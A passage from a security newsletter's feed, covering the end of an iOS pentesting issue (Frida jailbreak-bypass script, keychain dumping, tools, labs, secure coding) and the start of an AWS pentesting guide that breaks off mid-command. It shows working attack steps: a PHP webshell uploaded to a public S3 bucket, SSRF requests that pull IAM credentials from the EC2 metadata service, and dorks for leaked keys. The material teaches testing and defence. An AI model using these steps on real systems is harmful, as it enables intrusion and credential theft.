- Settings &gt; Wi-Fi &gt; [Your Network] &gt; Configure Proxy &gt; Manual
- Server: [Your Computer&apos;s IP]
- Port: 8080

Now all HTTP(S) traffic flows through Burp.

## 🚫 Bypassing Jailbreak Detection

Banking apps, DRM apps, and other security-conscious software often detect jailbreak and refuse to run. They&apos;re trying to protect themselves, but these checks are almost always bypassable.

Here are the common detection methods you&apos;ll encounter:

### Detection Techniques

**1. File System Checks**:
```objc
// Check for jailbreak files
if ([[NSFileManager defaultManager] fileExistsAtPath:@&quot;/Applications/Cydia.app&quot;]) {
    // Jailbroken
}
```

**2. URL Scheme Tests**:
```objc
if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@&quot;cydia://&quot;]]) {
    // Jailbroken
}
```

**3. Sandbox Violation Tests**:
```objc
// Try to write to restricted location
NSError *error;
[@&quot;test&quot; writeToFile:@&quot;/private/test.txt&quot; atomically:YES encoding:NSUTF8StringEncoding error:&amp;error];
if (!error) {
    // Jailbroken (sandbox escaped)
}
```

**4. Library Injection Detection**:
```objc
// Check for suspicious loaded libraries
uint32_t count = _dyld_image_count();
for (uint32_t i = 0; i &lt; count; i++) {
    const char *name = _dyld_get_image_name(i);
    if (strstr(name, &quot;Substrate&quot;) || strstr(name, &quot;Substitute&quot;)) {
        // Jailbreak detected
    }
}
```

**5. Root Privilege Tests**:
```objc
if (getuid() == 0) {
    // Running as root (jailbroken)
}
```

### Bypass with Frida

**Generic bypass script**:
```javascript
if (ObjC.available) {
    // Hook file existence checks
    var NSFileManager = ObjC.classes.NSFileManager;

    Interceptor.attach(NSFileManager[&apos;- fileExistsAtPath:&apos;].implementation, {
        onEnter: function(args) {
            var path = ObjC.Object(args[2]).toString();

            // If checking jailbreak paths, return false
            if (path.includes(&quot;Cydia&quot;) ||
                path.includes(&quot;substrate&quot;) ||
                path.includes(&quot;/bin/bash&quot;) ||
                path.includes(&quot;/etc/apt&quot;)) {
                console.log(&quot;[+] Hiding jailbreak file: &quot; + path);
                this.fake = true;
            }
        },
        onLeave: function(retval) {
            if (this.fake) {
                retval.replace(0);  // Return NO
            }
        }
    });

    // Hook URL scheme checks
    var UIApplication = ObjC.classes.UIApplication;

    Interceptor.attach(UIApplication[&apos;- canOpenURL:&apos;].implementation, {
        onEnter: function(args) {
            var url = ObjC.Object(args[2]).toString();
            if (url.includes(&quot;cydia://&quot;)) {
                console.log(&quot;[+] Hiding Cydia URL scheme&quot;);
                this.fake = true;
            }
        },
        onLeave: function(retval) {
            if (this.fake) {
                retval.replace(0);
            }
        }
    });
}
```

### Bypass with Liberty Lite

**[Liberty Lite](https://www.ios-repo-updates.com/repository/ryley-s-repo/package/com.ryleyangus.libertylite/)** is a Cydia tweak that bypasses jailbreak detection for selected apps.

**Installation**:
```bash
# Add repo to Cydia: https://ryleyangus.com/repo/
# Install &quot;Liberty Lite (Beta)&quot;
# Enable for target app in Settings
```

### Bypass with Objection

```bash
objection&gt; ios jailbreak disable
```

Another one-liner. Objection hooks the common jailbreak detection methods and neuters them. It won&apos;t catch every custom implementation, but it handles the usual suspects.

## 🔑 Keychain Overview

The iOS Keychain is where apps store sensitive data like passwords, tokens, and certificates. It&apos;s supposed to be secure, but developers often misconfigure it. That&apos;s where you come in.

**Quick check with Objection**:
```bash
objection -g &quot;Target App&quot; explore
objection&gt; ios keychain dump
```

Look for items with weak accessibility attributes like `kSecAttrAccessibleAlways` or `kSecAttrAccessibleAfterFirstUnlock`, which make keychain data accessible even when the device is locked. Check if sensitive data is stored without device-specific protection, allowing it to sync via iCloud. Watch for shared keychain groups that could leak data across multiple apps from the same developer.

For a comprehensive deep dive into iOS Keychain exploitation, vulnerability patterns, extraction techniques from backups, and Frida-based keychain dumping scripts, check out [Issue 10: Cracking the iOS Keychain](/post/issue-10).

## 🛠️ Essential Tools

**Static Analysis:**
- **[Ghidra](https://ghidra-sre.org/)**: Free NSA-developed reverse engineering tool
- **[radare2](https://rada.re/)** / **[rizin](https://rizin.re/)**: Command-line reverse engineering framework with powerful scripting
- **[Hopper Disassembler](https://www.hopperapp.com/)**: Commercial disassembler optimized for Mach-O binaries ($99)
- **[class-dump](https://github.com/nygard/class-dump)**: Extract Objective-C class headers (original repo unmaintained since 2019, use maintained forks like [0xced/class-dump](https://github.com/0xced/class-dump))
- **[dsdump](https://github.com/DerekSelander/dsdump)**: Extract Swift class information
- **[MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)**: Automated mobile security testing framework
- **[jtool2](http://www.newosxbook.com/tools/jtool.html)**: Mach-O binary analysis tool

**Dynamic Analysis:**
- **[Frida](https://frida.re/)**: Dynamic instrumentation toolkit
- **[Objection](https://github.com/sensepost/objection)**: Runtime mobile exploration (built on Frida)
- **[Cycript](http://www.cycript.org/)**: Hybrid Objective-C and JavaScript runtime
- **[Needle](https://github.com/FSecureLABS/needle)**: iOS security testing framework (deprecated but still useful)

**Jailbreaking:**
- **[checkra1n](https://checkra.in/)**: Bootrom exploit-based jailbreak for A5-A11 devices (iPhone 5s to iPhone X), iOS 12.0 - 14.8.1
- **[palera1n](https://palera.in/)**: checkm8-based jailbreak for A8-A11 devices, iOS 15.0 - 17.7+ (recommended for newer iOS versions)
- **[unc0ver](https://unc0ver.dev/)**: iOS 11.0 - 14.8 jailbreak
- **[Taurine](https://taurine.app/)**: iOS 14.0 - 14.3 jailbreak
- **[Dopamine](https://github.com/opa334/Dopamine)**: iOS 15.0 - 15.4.1 jailbreak

**Proxy &amp; MITM:**
- **[Burp Suite](https://portswigger.net/burp)**: HTTP proxy and testing suite
- **[mitmproxy](https://mitmproxy.org/)**: Interactive HTTPS proxy with Python scripting
- **[Charles Proxy](https://www.charlesproxy.com/)**: HTTP debugging proxy ($50)

**Jailbreak Detection Bypass:**
- **[SSL Kill Switch 2](https://github.com/nabla-c0d3/ssl-kill-switch2)**: Disable certificate pinning
- **[Liberty Lite](https://www.ios-repo-updates.com/repository/ryley-s-repo/package/com.ryleyangus.libertylite/)**: Bypass jailbreak detection
- **[Shadow](https://ios.jjolano.me/)**: Hide jailbreak from apps
- **[A-Bypass](https://repo.co.kr/)**: Universal jailbreak detection bypass

**Virtual Devices:**
- **[Corellium](https://www.corellium.com/)**: Cloud-based virtual iOS devices (enterprise pricing, contact for quote)
- **Xcode Simulator**: Free but limited (no jailbreak, no real device features)

## 🧪 Labs &amp; Practice

Start with **DVIA-v2** (Damn Vulnerable iOS App). It&apos;s intentionally vulnerable and covers everything we&apos;ve discussed: jailbreak detection, certificate pinning, keychain issues, local storage problems, and runtime manipulation. You can run it on the simulator or a jailbroken device. Grab it from [github.com/prateek147/DVIA-v2](https://github.com/prateek147/DVIA-v2).

**iGoat-Swift** is OWASP&apos;s take on a vulnerable iOS app. It&apos;s Swift-based, actively maintained, and has exercises covering the OWASP Mobile Top 10. Perfect for practicing modern iOS exploitation since most new apps are written in Swift anyway. Check it out at [github.com/OWASP/iGoat-Swift](https://github.com/OWASP/iGoat-Swift).

If you want something more realistic, **Damn Vulnerable Bank** simulates a banking app with real-world vulnerabilities. It has both Android and iOS versions, which is great if you&apos;re doing mobile security across platforms. Practice API security, authentication bypass, and insecure storage attacks in a realistic context. Find it at [github.com/rewanthtammana/Damn-Vulnerable-Bank](https://github.com/rewanthtammana/Damn-Vulnerable-Bank).

For techniques and payloads, bookmark the **HackTricks iOS Pentesting Guide**. It&apos;s a constantly updated collection of attack patterns and exploitation techniques. Way more practical than most documentation. Check it at [book.hacktricks.xyz/mobile-pentesting/ios-pentesting](https://book.hacktricks.xyz/mobile-pentesting/ios-pentesting).

And keep the **OWASP MASTG** (Mobile Application Security Testing Guide) handy. It&apos;s the official methodology with iOS-specific chapters and practical exercises. This should be your structured reference when you&apos;re doing professional assessments. Find it at [mas.owasp.org/MASTG](https://mas.owasp.org/MASTG/).


## 🔒 Secure Development Best Practices

**For Developers:**

**1. Use Keychain Correctly**
```objc
// Secure keychain storage
NSDictionary *query = @{
    (__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,
    (__bridge id)kSecAttrService: @&quot;com.example.app&quot;,
    (__bridge id)kSecAttrAccount: @&quot;user_token&quot;,
    (__bridge id)kSecValueData: tokenData,
    (__bridge id)kSecAttrAccessible: (__bridge id)kSecAttrAccessibleWhenUnlockedThisDeviceOnly  // SECURE
};
```

**2. Implement Proper Certificate Pinning**
```swift
// Using TrustKit
let trustKit = TrustKit(configuration: [
    kTSKPinnedDomains: [
        &quot;api.example.com&quot;: [
            kTSKPublicKeyHashes: [
                &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=&quot;,
                &quot;BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=&quot;  // Backup pin
            ]
        ]
    ]
])
```

**3. Obfuscate Sensitive Code**

Don&apos;t rely on obfuscation as your primary security mechanism. It buys you time, not safety. Use it as defense-in-depth alongside proper cryptography and secure storage. Tools like SwiftShield and iXGuard can help obfuscate Swift code, but remember that determined attackers will still reverse engineer your app.

**4. Implement Multi-Layered Jailbreak Detection**
```swift
func isJailbroken() -&gt; Bool {
    // Check 1: File system
    let paths = [&quot;/Applications/Cydia.app&quot;, &quot;/bin/bash&quot;, &quot;/usr/sbin/sshd&quot;]
    for path in paths {
        if FileManager.default.fileExists(atPath: path) { return true }
    }

    // Check 2: URL schemes
    if UIApplication.shared.canOpenURL(URL(string: &quot;cydia://&quot;)!) { return true }

    // Check 3: Sandbox escape
    let testPath = &quot;/private/test.txt&quot;
    do {
        try &quot;test&quot;.write(toFile: testPath, atomically: true, encoding: .utf8)
        try FileManager.default.removeItem(atPath: testPath)
        return true
    } catch {}

    return false
}
```

**5. Don&apos;t Store Secrets in Code**
```swift
// BAD
let apiKey = &quot;sk_live_XXXXXXXXXXXXXXXX&quot;

// GOOD
// Fetch from backend on first launch, store in keychain
```

**6. Use App Transport Security (ATS)**
```xml
&lt;!-- Info.plist --&gt;
&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;
&lt;dict&gt;
    &lt;key&gt;NSAllowsArbitraryLoads&lt;/key&gt;
    &lt;false/&gt;  &lt;!-- Enforce HTTPS --&gt;
&lt;/dict&gt;
```

## 🎯 Key Takeaways

iOS security is restrictive but it&apos;s not magic. Sandboxing and code signing raise the bar compared to Android, sure. But misconfigurations and logic bugs are everywhere. Static analysis still finds hardcoded secrets, insecure storage, and vulnerable dependencies in production apps.

Frida is your most powerful tool for iOS testing. Hooking functions, bypassing checks, and extracting data at runtime gives you visibility that static analysis alone never will. And certificate pinning? Usually trivial to bypass with SSL Kill Switch, Objection, or a custom Frida script.

Jailbreak detection is the same story. Liberty Lite, Objection, or manual Frida hooks defeat most implementations. And keychain misconfigurations are common. Apps using weak accessibility attributes leak credentials from backups or jailbroken devices.

Here&apos;s the thing: you don&apos;t always need a jailbroken device. Static analysis works on any IPA you can get your hands on. Objection works on non-jailbroken devices for many tasks. And if you need the full capabilities of a jailbreak without the hardware, Corellium gives you virtual iOS devices in the cloud.

One more thing. Objective-C is easier to reverse than Swift because method names are preserved. But both are reversible with the right tools. Don&apos;t let Swift intimidate you.

Finally, defense-in-depth matters. Apps relying on single-layer protections (just pinning, or just jailbreak detection) fail immediately under scrutiny. Multiple complementary security controls actually create barriers. Keep that in mind whether you&apos;re testing or building.

## 📚 Further Reading

- **[OWASP Mobile Application Security Testing Guide](https://mas.owasp.org/MASTG/)**: Comprehensive iOS security testing methodology
- **[HackTricks iOS Pentesting](https://book.hacktricks.xyz/mobile-pentesting/ios-pentesting)**: Extensive collection of iOS attack techniques and payloads
- **[iOS Application Security](https://www.amazon.com/iOS-Application-Security-Definitive-Hackers/dp/1593276028)** (Book): The definitive guide to iOS security by David Thiel
- **[Hacking and Securing iOS Applications](https://www.amazon.com/Hacking-Securing-iOS-Applications-Hijacking/dp/1449318746)** (Book): Practical iOS security techniques
- **[Frida CodeShare](https://codeshare.frida.re/)**: Community-contributed Frida scripts for iOS
- **[iOS Security Guide](https://support.apple.com/guide/security/welcome/web)** (Apple): Official documentation on iOS security architecture
- **[Corellium Documentation](https://support.corellium.com/)**: Virtual iOS device testing guides

---

That&apos;s it for this week!

If you&apos;ve been testing Android apps but avoiding iOS, the barrier to entry is lower than you think. Start with DVIA-v2 on the simulator. Practice static analysis with Ghidra. Get comfortable with Frida and Objection. When you&apos;re ready, invest in a jailbroken device (or Corellium subscription) and expand your capabilities.

The techniques overlap with Android (Frida, certificate pinning bypass, insecure storage) but the tooling and ecosystem are different. Give yourself time to learn the Apple-specific quirks. Once you do, you&apos;ll find iOS apps have just as many vulnerabilities as Android apps.

Thanks for reading, and happy hacking 📱

— Ruben</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>AWS for Pentesters: Your First Steps into Cloud Hacking</title><link>https://www.kayssel.com/newsletter/issue-28</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-28</guid><description>A beginner-friendly introduction to AWS security testing, from S3 buckets and metadata services to your first cloud foothold</description><pubDate>Sun, 14 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

I&apos;ll be honest. I&apos;m writing this newsletter because I need to learn AWS myself.

I&apos;m currently working on a project that involves cloud infrastructure, and I can&apos;t keep avoiding AWS anymore. For the longest time, I stayed in my comfort zone (web apps, APIs, smart contracts) but cloud security? That felt like a different world. IAM, EC2, S3, VPC, KMS, Lambda... it&apos;s overwhelming when you&apos;re starting from zero.

But here&apos;s the thing: I can&apos;t audit what I don&apos;t understand. And judging by the number of cloud breaches I keep reading about (Capital One, Uber, countless exposed S3 buckets), this knowledge is essential for modern pentesting.

So I&apos;m taking the approach I always do when learning something new: I document it and share it. This newsletter is as much for me as it is for you. I&apos;m breaking down AWS security from the perspective of someone who&apos;s never touched it before, because that&apos;s exactly where I am.

What I&apos;ve learned so far is encouraging: **you don&apos;t need to be a cloud architect to find cloud vulnerabilities**. Most AWS security issues aren&apos;t about complex IAM policies or sophisticated privilege escalation chains. They&apos;re misconfigurations. Public S3 buckets. Exposed metadata services. Overly permissive policies. The kind of stuff you can find with basic reconnaissance and a few simple commands.

The barrier to entry is low. You don&apos;t need an AWS account to test many attack vectors. And the free tier is enough to set up your own vulnerable environments for practice.

If you&apos;re in the same boat (comfortable with traditional pentesting but intimidated by cloud) this is your starting point. Let&apos;s learn this together.

In this issue, I&apos;ll cover:
- **AWS basics for pentesters** (regions, services, IAM fundamentals)
- **S3 bucket enumeration and exploitation** (the most common cloud vulnerability)
- **SSRF to AWS metadata service** (stealing credentials from EC2 instances)
- **Basic AWS reconnaissance** (finding cloud resources from external perspective)
- **Tools and techniques** for cloud security testing
- **Hands-on labs** to practice these skills

If you&apos;ve never touched AWS but want to start finding cloud vulnerabilities, this is your starting point. No prior cloud experience required.

Let&apos;s get started 👇

## ☁️ AWS 101: What Pentesters Need to Know

Before breaking things, let&apos;s understand what you&apos;re dealing with.

### What is AWS?

Amazon Web Services (AWS) is a cloud computing platform. Instead of companies running their own servers, they rent virtual machines, storage, and services from Amazon&apos;s data centers.

Think of it like this:
- **Traditional infrastructure**: Company buys servers, racks them, manages networking, storage, backups, etc.
- **Cloud infrastructure**: Company clicks a button, AWS provisions a server in seconds, company pays by the hour

For pentesters, this means:
- **Target infrastructure is dynamic**: Servers spin up and down constantly
- **Misconfigurations are common**: Developers often prioritize speed over security
- **Attack surface is public**: Many services have public endpoints by default

### Key AWS Services (Security Perspective)

You don&apos;t need to memorize all 200+ AWS services. Focus on these:

**S3 (Simple Storage Service)**: Object storage. Think Dropbox for developers. Files are stored in &quot;buckets&quot; that can be public or private. **Most common misconfiguration in AWS.**

**EC2 (Elastic Compute Cloud)**: Virtual machines. Servers running in AWS. Can be Linux or Windows.

**IAM (Identity and Access Management)**: Controls who can do what in AWS. Users, roles, policies. Critical for understanding privilege escalation.

**Lambda**: Serverless functions. Code that runs without a dedicated server. Can have overly permissive permissions.

**RDS (Relational Database Service)**: Managed databases (MySQL, PostgreSQL, etc.). Sometimes publicly accessible.

**CloudFront**: Content Delivery Network (CDN). Can lead to subdomain takeovers.

**Route 53**: DNS service. Useful for reconnaissance.

### AWS Regions and Availability Zones

AWS is organized geographically:

- **Region**: A physical location with multiple data centers (e.g., `us-east-1` = Northern Virginia, `eu-west-1` = Ireland)
- **Availability Zone (AZ)**: Individual data centers within a region

**Why this matters for pentesters:**
- Resources in different regions are isolated
- S3 bucket names are global, but buckets themselves are region-specific
- When enumerating, you might need to check multiple regions

Common regions:
- `us-east-1`: US East (N. Virginia) - **Most common, default for many services**
- `us-west-2`: US West (Oregon)
- `eu-west-1`: Europe (Ireland)
- `ap-southeast-1`: Asia Pacific (Singapore)

### IAM: The Backbone of AWS Security

IAM controls access in AWS. Understanding IAM is essential for cloud pentesting.

**IAM Components:**

**Users**: Individual accounts (e.g., `john@company.com`)

**Groups**: Collections of users with shared permissions

**Roles**: Identity that AWS resources can assume (e.g., EC2 instance role)

**Policies**: JSON documents that define permissions

**Example IAM Policy:**
```json
{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Action&quot;: &quot;s3:GetObject&quot;,
      &quot;Resource&quot;: &quot;arn:aws:s3:::my-bucket/*&quot;
    }
  ]
}
```

This policy allows reading objects from the bucket `my-bucket`.

**Key IAM Concepts:**

- **ARN (Amazon Resource Name)**: Unique identifier for AWS resources
  - Format: `arn:aws:service:region:account-id:resource`
  - Example: `arn:aws:s3:::my-bucket`

- **Principal**: Entity making the request (user, role, service)

- **Permissions boundary**: Maximum permissions a user can have

**From an attacker perspective:**
- Misconfigured IAM policies can grant excessive permissions
- Roles with overly broad permissions are gold
- Credential leaks (access keys) are common

### AWS Access Credentials

There are two types of credentials:

**1. Root Account Credentials**:
- Email and password for the AWS account
- **Full access to everything**
- Should never be used for day-to-day operations (but often is)

**2. IAM Access Keys**:
- Programmatic access credentials
- Consist of:
  - **Access Key ID**: Like a username (e.g., `AKIAIOSFODNN7EXAMPLE`)
  - **Secret Access Key**: Like a password (e.g., `wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY`)

**Long-term access keys start with `AKIA`** (IAM users, root account). If you see `AKIA` in source code, logs, or JavaScript, that&apos;s an AWS access key leak.

**Temporary access keys start with `ASIA`** (STS temporary credentials). These also require a session token.

**Security Token Service (STS) Temporary Credentials**:
- Temporary credentials with expiration (15 minutes to 12 hours)
- Access Key ID starts with `ASIA` (not `AKIA`)
- Include: Access Key ID, Secret Access Key, **Session Token**
- Session token is required for all API calls
- Commonly used by EC2 instance roles, Lambda functions, federated users

## 🪣 S3 Buckets: The Low-Hanging Fruit

S3 is the most common attack vector in AWS. Why? Because it&apos;s easy to misconfigure and the impact is often massive.

### What Makes S3 Dangerous?

S3 buckets can be:
- **Public**: Anyone on the internet can list and download files
- **Authenticated**: Only AWS users can access
- **Private**: Only specific IAM users/roles can access

The problem? Developers often make buckets public by accident or &quot;temporarily&quot; and forget to lock them down.

### S3 Bucket URL Formats

Buckets can be accessed via multiple URL formats:

**Path-style** (legacy):
```
https://s3.amazonaws.com/bucket-name/file.txt
https://s3-region.amazonaws.com/bucket-name/file.txt
```

**Virtual-hosted style** (current standard):
```
https://bucket-name.s3.amazonaws.com/file.txt
https://bucket-name.s3-region.amazonaws.com/file.txt
```

**Website hosting**:
```
http://bucket-name.s3-website-region.amazonaws.com/
http://bucket-name.s3-website.region.amazonaws.com/
```

### Finding S3 Buckets

**1. Look for S3 URLs in Target Applications**

Check:
- JavaScript files
- Image/CSS/font URLs
- API responses
- Mobile app decompilation
- HTML source code

Example finding:
```javascript
// Found in app.js
const API_URL = &quot;https://company-api-prod.s3.amazonaws.com/config.json&quot;;
```

**2. Enumerate Based on Company Name**

S3 bucket names are globally unique and often follow patterns:

Common naming patterns:
```
company-name
company-name-prod
company-name-dev
company-name-staging
company-uploads
company-backups
company-logs
company-assets
company-static
www.company.com
dev.company.com
```

**3. Subdomain Enumeration**

Use subdomain enumeration tools and check if subdomains point to S3:

```bash
# Using amass
amass enum -d target.com -o subdomains.txt

# Check each subdomain for S3
while read sub; do
  host $sub | grep -i &quot;s3&quot;
done &lt; subdomains.txt
```

If you see:
```
dev.company.com is an alias for dev-company.s3.amazonaws.com
```

That&apos;s an S3 bucket.

### Testing S3 Bucket Access

Once you find a bucket name, test if it&apos;s accessible:

**Method 1: Browser**

Try accessing:
```
https://bucket-name.s3.amazonaws.com/
```

If you get an XML listing, it&apos;s public:
```xml
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;ListBucketResult&gt;
  &lt;Name&gt;bucket-name&lt;/Name&gt;
  &lt;Contents&gt;
    &lt;Key&gt;file1.txt&lt;/Key&gt;
    ...
  &lt;/Contents&gt;
&lt;/ListBucketResult&gt;
```

If you get `AccessDenied`, it exists but isn&apos;t publicly listable (might still have public files).

If you get `NoSuchBucket`, it doesn&apos;t exist.

**Method 2: AWS CLI**

Install AWS CLI (no credentials needed for public buckets):

```bash
# List bucket contents
aws s3 ls s3://bucket-name --no-sign-request

# Download a file
aws s3 cp s3://bucket-name/file.txt ./file.txt --no-sign-request

# Sync entire bucket
aws s3 sync s3://bucket-name ./local-folder --no-sign-request
```

The `--no-sign-request` flag attempts anonymous access.

### S3 Permissions: Read vs Write

Buckets can have different permission combinations:

**Public Read**: Can list and download files (most common misconfiguration)

**Public Write**: Can upload files (rare but critical)

Test write access:
```bash
# Try to upload a file
echo &quot;test&quot; &gt; test.txt
aws s3 cp test.txt s3://bucket-name/test.txt --no-sign-request
```

If successful, you can:
- Upload webshells to static website buckets
- Overwrite critical files
- Inject malicious content

**Public Read ACL**: Can read the bucket&apos;s access control list

```bash
aws s3api get-bucket-acl --bucket bucket-name --no-sign-request
```

### Real-World S3 Exploitation Examples

**Scenario 1: Public Backup Bucket**

```bash
aws s3 ls s3://company-backups --no-sign-request

# Output:
# database-backup-2025-12-01.sql.gz
# application-secrets.env
# id_rsa
```

You just found database backups, environment variables with API keys, and SSH private keys.

**Scenario 2: Public Upload Bucket with Website Hosting**

```bash
# Check if bucket hosts a static website
curl http://company-uploads.s3-website-us-east-1.amazonaws.com

# Upload a webshell
echo &apos;&lt;?php system($_GET[&quot;c&quot;]); ?&gt;&apos; &gt; shell.php
aws s3 cp shell.php s3://company-uploads/shell.php --no-sign-request

# Access it
curl http://company-uploads.s3-website-us-east-1.amazonaws.com/shell.php?c=whoami
```

**Scenario 3: Subdomain Takeover via S3**

If a DNS record points to a non-existent S3 bucket, you can create it and take over the subdomain:

```
dev.company.com CNAME dev-company.s3.amazonaws.com
```

If `dev-company` bucket doesn&apos;t exist, create it:

```bash
aws s3 mb s3://dev-company --region us-east-1
echo &quot;Subdomain Takeover PoC&quot; &gt; index.html
aws s3 cp index.html s3://dev-company/index.html
aws s3 website s3://dev-company --index-document index.html
```

Now `dev.company.com` serves your content.

**Impact**: Phishing, XSS (if parent domain cookies aren&apos;t properly scoped), reputation damage.

## 🔍 EC2 Metadata Service: SSRF to Credentials

If you find an SSRF (Server-Side Request Forgery) vulnerability in an application running on AWS EC2, you can steal credentials.

**Note**: For a comprehensive guide on finding and exploiting SSRF vulnerabilities, check out [Issue 4: Inside the Request - From Basic SSRF to Internal Takeover](/post/issue-4), where I cover SSRF fundamentals, detection techniques, and exploitation methods. This section focuses specifically on exploiting SSRF in AWS environments to access the metadata service.

### What is the EC2 Metadata Service?

Every EC2 instance has access to a special internal endpoint that provides metadata about the instance:

```
http://169.254.169.254/
```

This endpoint is **only accessible from within the EC2 instance**. External users can&apos;t reach it directly. But if the application has SSRF, you can.

### What&apos;s Available in Metadata?

The metadata service exposes:
- Instance details (AMI ID, instance type, region)
- **IAM role credentials** (if the instance has a role attached)
- User data (startup scripts, sometimes contains secrets)
- Network information

**Why this matters:**
- If the EC2 instance has an IAM role, you can steal temporary credentials
- Those credentials grant whatever permissions the role has
- Common scenario: EC2 role has S3 read/write, database access, Lambda invoke, etc.

### Metadata Service Versions

**IMDSv1** (Instance Metadata Service Version 1):
- Simple HTTP GET requests
- No authentication required
- Easy to exploit via SSRF

**IMDSv2** (Instance Metadata Service Version 2):
- Requires a session token
- Token obtained via HTTP PUT with custom header
- Harder to exploit (but still possible)

### Exploiting IMDSv1 via SSRF

Assume you found an SSRF vulnerability where you can control a URL parameter:

```
https://target.com/api/fetch?url=&lt;YOUR_URL&gt;
```

**Step 1: Confirm Metadata Access**

```
https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/
```

If you get a response like:
```
ami-id
hostname
iam/
instance-id
local-ipv4
public-ipv4
```

You&apos;ve hit the metadata service.

**Step 2: Check for IAM Role**

```
https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

If the instance has a role, you&apos;ll see the role name:
```
web-server-role
```

**Step 3: Retrieve Credentials**

```
https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/web-server-role
```

Response:
```json
{
  &quot;AccessKeyId&quot;: &quot;ASIAXXXXXXXXXXX&quot;,
  &quot;SecretAccessKey&quot;: &quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY&quot;,
  &quot;Token&quot;: &quot;IQoJb3JpZ2luX2VjEH...&quot;,
  &quot;Expiration&quot;: &quot;2025-12-14T12:00:00Z&quot;
}
```

You now have temporary AWS credentials. Note the `ASIA` prefix indicating temporary credentials.

**Step 4: Use the Credentials**

Export them locally:
```bash
export AWS_ACCESS_KEY_ID=&quot;ASIAXXXXXXXXXXX&quot;
export AWS_SECRET_ACCESS_KEY=&quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY&quot;
export AWS_SESSION_TOKEN=&quot;IQoJb3JpZ2luX2VjEH...&quot;
```

Test what permissions you have:
```bash
# Check identity
aws sts get-caller-identity

# List S3 buckets
aws s3 ls

# Enumerate permissions (requires additional tools)
```

**Step 5: Enumerate Permissions**

Once you have credentials, you need to discover what permissions they have. You can brute-force IAM permissions using enumeration tools (covered in the Tools section below) to systematically test what actions the role can perform.

### Exploiting IMDSv2

IMDSv2 requires a token. To get the token, you must:

1. Send a PUT request to `/latest/api/token` with header `X-aws-ec2-metadata-token-ttl-seconds`
2. Use the returned token in subsequent requests with header `X-aws-ec2-metadata-token`

**Challenge:** Most SSRF vulnerabilities only allow GET requests, not PUT.

**Workarounds:**
- If SSRF allows custom headers, you can still exploit IMDSv2
- Some SSRF bypasses allow HTTP verb tampering
- Look for chained vulnerabilities (SSRF + CRLF injection)

Example with custom headers (if allowed):
```
PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600
```

### User Data Exposure

EC2 instances can have &quot;user data&quot; scripts that run on startup. These sometimes contain secrets:

```
http://169.254.169.254/latest/user-data
```

Response might include:
```bash
#!/bin/bash
export DB_PASSWORD=&quot;super_secret_password&quot;
export API_KEY=&quot;sk_live_XXXXXXX&quot;
```

## 🔎 AWS Reconnaissance from External Perspective

You don&apos;t need AWS credentials to enumerate resources. Here&apos;s what you can find from outside.

### DNS Enumeration

Find subdomains that point to AWS services:

```bash
# Subdomain enumeration
amass enum -d target.com -o subs.txt
subfinder -d target.com -o subs.txt

# Check for AWS services
while read sub; do
  dig $sub | grep -E &apos;s3|cloudfront|elb|ec2&apos;
done &lt; subs.txt
```

Look for:
- **S3**: `s3.amazonaws.com`, `s3-website`
- **CloudFront**: `cloudfront.net`
- **ELB (Load Balancer)**: `elb.amazonaws.com`, `amazonaws.com`

### Certificate Transparency Logs

Services like **[crt.sh](https://crt.sh)** and **[Censys](https://censys.io)** index SSL certificates. AWS services often appear here:

```bash
curl -s &quot;https://crt.sh/?q=%.target.com&amp;output=json&quot; | jq -r &apos;.[].name_value&apos; | sort -u
```

Look for S3 bucket names in certificate SANs.

### Shodan and Censys

Search for AWS-related services:

**Shodan queries:**
```
org:&quot;Amazon.com&quot; hostname:target.com
&quot;Access Key ID&quot; &quot;Secret Access Key&quot;
```

**Censys queries:**
```
parsed.names:target.com and tags:s3
```

### GitHub and Code Search

Developers often commit AWS credentials and bucket names:

**GitHub Dorks:**
```
org:target-company &quot;AKIA&quot;
org:target-company &quot;ASIA&quot;
org:target-company &quot;aws_secret_access_key&quot;
org:target-company &quot;s3.amazonaws.com&quot;
filename:.env &quot;AWS&quot;
```

Use automated secret scanning tools (covered in Tools section) to efficiently scan repositories for leaked credentials.

### Network Reconnaissance

Scan for open ports on EC2 instances:

```bash
# Find EC2 IP ranges for a region
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | \
  jq -r &apos;.prefixes[] | select(.region==&quot;us-east-1&quot; and .service==&quot;EC2&quot;) | .ip_prefix&apos;

# Scan target IPs
nmap -sV -p 22,80,443,3389,3306,5432,6379,27017 target-ip
```

Common misconfigurations:
- Port 22 (SSH) open to `0.0.0.0/0`
- Port 3306 (MySQL) or 5432 (PostgreSQL) publicly accessible
- Port 6379 (Redis) without authentication

## 🛠️ Essential Tools for AWS Pentesting

### Reconnaissance and Enumeration

**[ScoutSuite](https://github.com/nccgroup/ScoutSuite)**: Multi-cloud security auditing tool

```bash
pip install scoutsuite
scout aws --profile &lt;profile-name&gt;
```

Generates an HTML report with findings across IAM, S3, EC2, RDS, etc.

**[Prowler](https://github.com/prowler-cloud/prowler)**: AWS security assessment tool

```bash
pip install prowler
prowler aws --compliance cis_2.0
```

**[CloudMapper](https://github.com/duo-labs/cloudmapper)**: Visualize AWS environments

```bash
git clone https://github.com/duo-labs/cloudmapper
cd cloudmapper
python cloudmapper.py collect --account my-account
python cloudmapper.py prepare --account my-account
